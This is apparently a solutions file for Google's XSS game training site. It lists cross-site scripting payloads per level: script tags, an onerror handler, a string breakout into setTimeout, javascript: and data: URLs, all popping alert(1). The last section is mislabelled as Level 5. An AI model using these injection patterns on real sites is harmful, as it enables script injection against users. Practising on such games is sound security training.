######################################################################################################
#
# URL = http://xss-game.appspot.com/level1
#
######################################################################################################
######################################################################################################
#
# Level 1
#
##
L#45
<script>alert(1);</script>
######################################################################################################
#
# Level 2
#
##
L#30
<img src="/" onerror="javascript:alert(1);" />
######################################################################################################
#
# Level 3
#
##
http://xss-game.appspot.com/level3/frame#1.jpg' /><script>alert(1);</script>
######################################################################################################
#
# Level 4
#
##
index.html:
function startTimer(seconds) {
seconds = parseInt(seconds) || 3;
setTimeout(function() {
window.confirm("Time is up!");
window.history.back();
}, seconds * 1000);
}
->
function startTimer(seconds) {
seconds = parseInt(seconds); alert(seconds); seconds = parseInt(seconds) || 3;
setTimeout(function() {
window.confirm("Time is up!");
window.history.back();
}, seconds * 1000);
}
->
'); alert(1); seconds = parseInt('
######################################################################################################
#
# Level 5
#
##
L#15:signup.html
<a href="{{ next }}">Next >></a>
->
<a href="javascript:alert(1);">Next >></a>
######################################################################################################
#
# Level 5
#
##
http://xss-game.appspot.com/level6/frame#data:text/html;charset=utf-8,alert(1);
/Web/XSS - Data.txt